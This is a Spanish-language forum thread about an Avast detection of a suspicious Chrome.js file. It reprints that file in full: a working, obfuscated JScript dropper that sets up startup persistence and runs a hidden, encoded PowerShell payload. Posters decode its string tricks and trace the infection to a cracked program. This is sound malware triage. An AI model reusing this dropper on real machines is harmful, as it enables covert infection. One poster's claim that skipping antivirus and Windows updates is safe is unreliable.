Página 1 de 2 12 ÚltimoÚltimo
Resultados 1 al 10 de 12

Tema: IDP.ALEXA.51 ¿Amenaza o falso positivo?

  1. #1

    Predeterminado IDP.ALEXA.51 ¿Amenaza o falso positivo?

    Nada más iniciar sesión hoy me ha salido este aviso.

    Lo he movido al baúl y he hecho unas cuantos escaneos extra pero no ha salido nada más.

    Mencionar que ahora mismo no tengo el navegador Chrome instalado, así que desde luego ese script no tiene nada que ver con él.

    • Ryzen 3700X
    • MSI MPG X570 Gaming Edge Wifi
    • Corsair RGB 3200 2x8GB DDR4
    • KFA2 GTX1070

  2. #2

    Predeterminado Re: IDP.ALEXA.51 ¿Amenaza o falso positivo?

    Seguramente sea un falso positivo como el 99% de lo que detectan los antivirus, de todas formas mejor asegurarse.
    Envíalo a virustotal.com a ver qué te dice.
    Aquí tienes una explicación sobre el alexa este:
    https://www.pcrisk.com/removal-guide...alexa-51-virus

  3. #3

    Predeterminado Re: IDP.ALEXA.51 ¿Amenaza o falso positivo?

    Con los launchers de ciertos juegos (tipo Attila, Roma II, Warhammer II,...) Avast detecta eso al parecer desde hace unos meses. También con alguna otra app. Falso positivo

    El problema es que son varios AVs los que están usando esa definición para detectar diferente tipo de malware, muchos son relacionados con juegos online pero otras apps también.

    Aún así, si tienes dudas, haz un escaneo con Malwarebytes en Modo Seguro porque wscript.exe se encarga del lanzamiento de scripts , pero también puede infectarse (es más raro estando en system32 que en otras ubicaciones, pero compruébalo). Analiza ambas carpetas, donde está el js y el wscript.exe o mándalos a análisis como te dijeron.

    Estaba mirando si encontraba algo exactamente igual, pero lo más que me acerco es a una detección de MBAM de un archivo con ese nombre pero en otra ubicación de la carpeta AppData y como es buscar un alfiler en un pajar ... ahí se queda .

    A ver qué nos cuentas pero tiene la pinta de FP.

    Un saludo.
    Última edición por erchinchetas; 26/07/2019 a las 12:35

  4. #4

    Predeterminado Re: IDP.ALEXA.51 ¿Amenaza o falso positivo?

    Virus total dice que 5 motores (curiosamente, Avast no) lo detectan como chungo, pero ninguno lo menciona como Alexa.51.

    He abierto este archivo JavaScript, ya que es texto y lo peligroso no es el archivo en sí, sino lo que el script intentaba hacer, a ver si entendía algo de sus intenciones, pero uff.. no pillo mucho, menudo galimatías.

    Veo que menciona alguna ruta de FIFA. No tengo FIFA. ¿Da por hecho que todo dios va a tener un fifa instalado y va a intentar ocultarse ahí o qué?

    Se menciona una aplicación llamada "tixeo". Es una apli de videoconferencias, no la uso ni conozco

    Sale la cadena "eliforPresU". Me ha dado por googlearlo, me ha llevado a un foro de hackers donde un usuario comenta la creación de un virus hecho en VB6, que no tiene nada que ver con este script, pero también emplea esa misma cadena de texto y parece que se usa como cadena invertida para despistar.
    Si cambiamos el orden, esa cadena dice: UserProfile

    Es decir, intentan acceder a la carpeta perfil de usuario, pero la invierten para intentar despistar a los antivirus, supongo yo vamos...



    Aquí el código del Script:
    Cita Iniciado por Chrome.js
    DASGRHETJWAHTR6JE4JAWEHJ = function(ObjN) { ResName = new ActiveXObject(ObjN); return ResName;};WScript.Sleep(5005);function DGHTEJ4ETJ3JHEJW5Q3JUHAEJHQ(str) { splitString = str.split(""); reverseArray = splitString.reverse(); joinArray = reverseArray.join(""); return joinArray; };aq = DGHTEJ4ETJ3JHEJW5Q3JUHAEJHQ("sj.emorhC\\setalpmeT\ \swodniW\\tfosorciM\\gnimaoR\\ataDppA\\");SETYa = DGHTEJ4ETJ3JHEJW5Q3JUHAEJHQ("tAFIFcejAFIFbOmetAFIF sySelAFIFiF.gAFIFniAFIFtpirAFIFcS");SETYaa = SETYa.replace(/FIFA/g, '');fso=WScript.CreateObject (SETYaa); zr = fso.FileExists(aq); if (zr == false) {SETYs = DGHTEJ4ETJ3JHEJW5Q3JUHAEJHQ("llAFIFeAFIFhS.tpiAFIF rcAFIFSW");SETYss = SETYs.replace(/FIFA/g, '');wscr = new DASGRHETJWAHTR6JE4JAWEHJ(SETYss); fso.CopyFile (WScript.ScriptFullName, wscr.ExpandEnvironmentStrings(DGHTEJ4ETJ3JHEJW5Q3J UHAEJHQ("%eliforPresU%")) + aq , true);WScript.Sleep(4004);link = wscr.SpecialFolders(DGHTEJ4ETJ3JHEJW5Q3JUHAEJHQ("p utratS"))+DGHTEJ4ETJ3JHEJW5Q3JUHAEJHQ("\\")+DGHTEJ 4ETJ3JHEJW5Q3JUHAEJHQ("knl.ini.emorhC");shortcut = wscr.CreateShortcut(link);shortcut.TargetPath = DGHTEJ4ETJ3JHEJW5Q3JUHAEJHQ("%eliforPresU%") + aq;shortcut.Arguments = DGHTEJ4ETJ3JHEJW5Q3JUHAEJHQ("");shortcut.Descripti on = DGHTEJ4ETJ3JHEJW5Q3JUHAEJHQ("ini.emorhC");shortcut .IconLocation = DGHTEJ4ETJ3JHEJW5Q3JUHAEJHQ("96,lld.23LLEHS\\23met sys\\%tooRmetsyS%");shortcut.WindowStyle = 4;shortcut.Save();}WScript.Sleep(4004);SETYy = DGHTEJ4ETJ3JHEJW5Q3JUHAEJHQ("lleAFIFhsAFIFrewAFIFo pAFIF");SETYyy = SETYy.replace(/FIFA/g, '');C=SETYyy;BB=DGHTEJ4ETJ3JHEJW5Q3JUHAEJHQ("tixeo n- ");RR=DGHTEJ4ETJ3JHEJW5Q3JUHAEJHQ(" e- ");JJ=DGHTEJ4ETJ3JHEJW5Q3JUHAEJHQ("4GApBgcAQHATBAN AYDAlBwcAEGAiBQbA8GAyBgRAoDA6AQXAQHAyBQZAYHAuBwbAM EAbBAKAQGAhBwbAwEAuAgbAkGAhBQbA8GAEBAdA4GAlBgcAIHA 1BwQAoDA6AQXA4GApBQYA0GAvBARAAHAwBQQAsFA7AgMAIDAgA AcAUGAlBAbAMHAgAAI");GG=DGHTEJ4ETJ3JHEJW5Q3JUHAEJH Q("BBwMAIDAzAwLAkHAsBgLAQHApBgYA8CAvAgOAMHAwBAdAQH AoBwJAgCAnAwZA4GApBgcAQHATBAZAEGAvBAbA4GA3BwbAQEAn AgLAkCAnAAdA4GAlBQaAwGADBgYAUGAXBgLAQHAlBgTAcCAgAA dAMGAlBgaAIGAPBQLAcHAlBgTAgCAoAwZA");IP=DGHTEJ4ETJ 3JHEJW5Q3JUHAEJHQ("==AApAAbAwGA1BgbAQCAsAAbAwGA1Bg bAQCAoAQZAsGAvBgdA4GApBgLAQHAuBQaA8GAQBQeAIHA0BgbA UEAuAQKAkCApAwJAEEAnAALAcCAhAgKA4FAnAAKAUGAjBQYAwG AwBQZAIHAuAQKAcCAQBwRAUEA");wscr.Run(C+BB+RR+JJ+GG +IP,0,false);

    En fin, llegados a este punto, he de confesar que justo en la sesión anterior instalé un programa de "dudosa" procedencia.

    Aunque lo escaneé varias veces, y lo he vuelto a escanear, y no parece tener peligro alguno.
    Pero vamos, si atamos cabos....

    En fin, espero que no haya nada más a parte de este script que, gracias a Avast (luego muchos dicen que es tontería usar antivirus), ha sido bloqueado.
    • Ryzen 3700X
    • MSI MPG X570 Gaming Edge Wifi
    • Corsair RGB 3200 2x8GB DDR4
    • KFA2 GTX1070

  5. #5

    Predeterminado Re: IDP.ALEXA.51 ¿Amenaza o falso positivo?

    He cogido el código, creado un archivo "chrome.js", enviado a VT ---> 1 detección (Qihoo).

    Si tienes dudas, cuando es así, es mejor enviar la muestra y que la analicen en los laboratorios, realmente mirando el código, para no hacerlo únicamente en función de la base de firmas como en ocurre en VT.

    Según leí hace tiempo, en VT las casas antivirus ofrecen motores (casi siempre diferentes a los de producto de escritorio) en los que no siempre están incluidas características como análisis heurísticos, al menos de forma completa, ya que en un análisis "bajo demanda" no tiene sentido hablar de "heurística" ya que en una heurística real el comportamiento de un archivo habría que hacerlo en vivo, en funcionamiento y no en un análisis bajo demanda.

    Dicho lo anterior podrías enviarles la muestra del "chrome.js" a:

    Envío de muestra a Avast

    Se supone que enviándoselo te mandarán el resultado al email, habiendo estudiado el código más a fondo. Te puse la dirección de Avast pero todos los AVs tienen la suya propia para el envío de muestras.

    Quizás incluso desde la interfaz de Avast tengas esa opción. Hace tiempo que dejé de usarlo/probarlo.

    En cuanto a lo de que hay gente que dice que no necesita un antivirus, que tiene su ordenador limpio, etc..........a mí me hace gracia, pero si luego les dices algo .......... Así que cada uno viva en su mundo a su manera.

    Un saludo.

  6. #6

    Predeterminado Re: IDP.ALEXA.51 ¿Amenaza o falso positivo?

    Yo soy de los que no usan antivirus, ni actualizan windows y oye tan feliz
    Eso sí, un buen firewall es imprescindible, el de windows no vale para nada, de hecho he detectado troyanos que no son vistos por los antivirus.
    Con un poco de cuidado con lo que descargas y si algo es sospechoso lo envías a virustotal y asunto arreglado.
    Desde mi primer ordenador un 286, sin antivirus y por aquí sigo.
    Ya se sabe, cada uno con sus manías.

  7. #7

    Predeterminado Re: IDP.ALEXA.51 ¿Amenaza o falso positivo?

    Cita Iniciado por erchinchetas Ver mensaje
    Quizás incluso desde la interfaz de Avast tengas esa opción.
    Si tiene opción, ya lo envíe.

    Lo de FIFA, me he fijado que es otra triquiñuela. Las cadenas que contienen los caracteres FIFA luego son reemplazados por "cadena vacía", o sea por nada. Son caracteres extra que meten en las cadenas para encriptarlas un poquito.

    Si a esta cadena:
    llAFIFeAFIFhS.tpiAFIFrcAFIFSW

    Sustituimos FIFA por nada, y luego invertimos el orden, tenemos:
    Wscript.shell

    O esta:
    tAFIFcejAFIFbOmetAFIFsySelAFIFiF.gAFIFniAFIFtpirAF IFcS

    Sería:
    Scripting.FileSystemObject


    Son pequeñas tretas sencillas que efectivamente le complican el trabajo a cualquier software que analice el script para interpretar el código
    • Ryzen 3700X
    • MSI MPG X570 Gaming Edge Wifi
    • Corsair RGB 3200 2x8GB DDR4
    • KFA2 GTX1070

  8. #8

    Predeterminado Re: IDP.ALEXA.51 ¿Amenaza o falso positivo?

    Kgonla, yo no hablo de felicidad sino de seguridad

    Es un tema ya tratado en otros posts más antiguos y tampoco quiero entrar en polémica con nadie. Doy mi opinión.

    Un PC sin antivirus, por muchas buenas costumbres que tenga alguien, visitando webs fiables (lo cual hoy en día no existe), analizando todo lo que quiera en VT, etc etc siempre va a estar más comprometido que un PC con un buen antivirus.

    OJO, yo no digo que cualquier antivirus valga. Hay algunos que son casi peor que algunos malware.

    De hecho, yo soy el primero en recomendar instalar siempre lo mínimo en un PC y suelo recomendar apps portables, standalones, etc. Pero un buen antivirus lo considero indispensable.

    Incluso alguien que sea "analista profesional" dudo que se atreviera a afirmar que con un firewall se pueda sentir seguro.

    Sin hablar de vulnerabilidades que tengas en apps fiables ya instaladas y otros temas, vamos al tema "firewall".

    Un ejemplo. Siempre pongo el mismo porque me pareció que despues de ello hubo un antes y un despues. El rootkit Rustock, del cual no se conoce muy bien su origen aún hoy en día, y de hecho aunque se hablen de más variantes quizás las que marcaron la diferencia fueron la A-B-C. Fue un rootkit "indetectable" durante años, creo que era en especial la "C". Un par de casas (rusas) "suponían" su existencia pero eran incapaces de hacerse con el "dropper" (sólo disponían de un driver pero les faltaba el dropper). Pero es que en la variante A una vez ya instalada usaban técnicas de parcheo de IRP para poder seguir lanzando su spam e infectando nuevas máquinas saltándose los firewalls.

    Hoy en día los firewalls han mejorado mucho, unos más que otros, pero muchos rootkits en vez de intentar saltárselos lo que hacen es engañarlos.

    Tampoco me quiero enrollar. Un buen artículo de ello (aunque antiguo ya):

    PDF

    Pero bueno, que incluso en el año 2018 en Black Hat se habló de la facilidad de romper, saltarse y desmantelar apps firewall en macOS (Enlace)

    Y artículos sobre cómo saltarse firewalls corporativos ..hay un porrón. Ya no te digo, de firewalls de Escritorio

    Pero oye, que yo respeto todas las opiniones, pero creo que en estos temas hay que ser objetivo y hablar de 2 cosas: seguridad y sensación de seguridad.

    La seguridad total NO existe, pero la sensación de seguridad y el nivel de seguridad aumenta con un buen antivirus (y firewall, claro).

    -----------------------------------------------------------
    Y a lo que venía, que era para decirle a Kabuto que si manda la muestra al laboratorio de Avast siempre es mejor mandar un zip con el archivo y una imagen de la detección, mejor comprimido con contraseña e incluyendo en el comprimido un comentario de la contraseña.

    Aunque a ellos creo que les dará igual, es una buena costumbre . generalmente se suele poner en Asunto: FP y añadir en el email la contraseña: infected o la que quieras.

    Aunque ya te digo, creo que desde la interfaz de Avast si sigue existiendo Virus Chest puedes hacer lo mismo.

    ---
    Llego tarde Kabuto , ya lo enviaste. Casi casi ya te has parado tú solo a analizarlo

    Un saludo.

  9. #9

    Predeterminado Re: IDP.ALEXA.51 ¿Amenaza o falso positivo?

    Sobre la conveniencia o no de usar antivirus.

    Es cierto que si se va con ojo y cabeza, ya estás bastante bien protegido. Pero el mundo de los virus es muy amplio y no es tan sencillo como que si un archivo está infectado o no.

    Mirad, no se de donde me salió este script.
    Como dije, lo único "imprudente" que hice fue instalar un programa de origen dudoso, así que supongo que por ahí me ha venido el malware.

    Lo voy a explicar un poco por si sirve para hacer pedagogía.

    El programa que instalé es simplemente un Aida64 que ya viene activado.
    No voy a poner el enlace, pero lo cierto es que dicho enlace está en Youtube. Es un vídeo que en los comentarios da un enlace a un Google Drive para descargar un zip con el programa.

    Dicho zip, lo analicé con Avast y no detectó nada.
    Es más, lo he vuelto a descargar (lo borré tras la instalación) y lo he pasado por VirusTotal. Tampoco ha detectado nada.


    ¿Podemos dar por sentado que es un software seguro y sin riesgos?
    Quizás lo sea, porque repito que no se si es el culpable. (desde luego sí el principal sospechoso)

    Pero mirad, este tipo de infección que he tenido, en realidad no es una infección al uso.
    Es posible que los archivos de instalación de la versión de Aida64 que me bajé no tengan ningún virus, pero luego no sabemos a ciencia cierta que está haciendo esa instalación, pues el instalador está modificado (los menús tenían letras rusas, y menudos son estos....)

    Puede que fuera este instalador el que me crease ese script camuflado con el nombre de Chrome para disimular. Y es que este archivo tampoco está infectado como tal, es tan solo un archivo de texto plano con código JavaScript.
    Lo peligroso, es cuando se ejecuta ese script.

    Si yo no tuviera antivirus y hubiera confiado únicamente en que VirusTotal me ha dicho que el zip que he descargado estaba limpio, posiblemente nada en mi sistema habría detectado que un script había empezado a hacer cosas chungas.

    Por suerte tenía Avast vigilando, quien detectó y bloqueó la ejecución de ese script. Sin él, seguramente no me habría dado cuenta de nada.

    Así que no desdeñéis el uso de software antivirus, porque hay amenazas mucho más sutiles que simples ejecutables con código inyectado...
    Amenazas que no se detectan analizando archivos, si no con un software que vigile en tiempo real que está pasando en nuestro sistema operativo y que procesos intentan hacer cosas que no debieran.
    • Ryzen 3700X
    • MSI MPG X570 Gaming Edge Wifi
    • Corsair RGB 3200 2x8GB DDR4
    • KFA2 GTX1070

  10. #10

    Predeterminado Re: IDP.ALEXA.51 ¿Amenaza o falso positivo?

    Kabuto ... parece mentira.

    Regla de Oro para descargar algo "modificado": nunca hacerlo desde Youtube. La mayor parte de las veces de todo lo que se pone en Youtube tiene enlaces Google Drive y tienen "algo".

    Si alguien quiere un repack, un reloaded o lo que sea .....siempre buscarlo en la web del autor o en foros donde postee. A veces es cierto que es difícil saber quien es el autor, pero molestándose un poco se encuentra. Generalmente son foros rusos, vietnamitas, o chinos.

    Yo no recomiendo repacks, ni nada por el estilo pero sí es cierto que a veces esos repacks simplemente son eso, reconstrucciones de la app o juego sin haber tocado nada o casi nada, pero usando otros empaquetadores. Pero siempre mejor bajarlos de un foro, donde participe gente, es más difícil que alguien se atreva a meter "cosas" dentro porque es más sencillo de descubrir y ese autor perdería credibilidad.

    El que sube enlaces a Youtube .......... malo, malo.

    Pero en foros hay autores (e incluso equipos) que llevan casi toda una vida haciendo cosas de esas y muchas veces lo que se detecta son simples FP.

    Aunque yo iría con pies de plomo siempre para esas cosas. Con la cantidad de apps gratuitas para casi todo. ¿Qué necesidad hay de descargar esas otras?

    Y hablando un poco en general, además de lo que se cuelga en Youtube también hay que evitar esas webs "clonadas" donde descargar cosas. Suelen ser webs sin comentarios y tener la misma estructura, además de tener enlaces caducados y el único que sirve ser de pago (hacerte suscripción ya que no tiene servicio Free de descarga). De esas hay tropecientas y suelen ser clones.

    Un saludo.
    Última edición por erchinchetas; 27/07/2019 a las 10:20

Página 1 de 2 12 ÚltimoÚltimo

Permisos de publicación

  • No puedes crear nuevos temas
  • No puedes responder temas
  • No puedes subir archivos adjuntos
  • No puedes editar tus mensajes
  •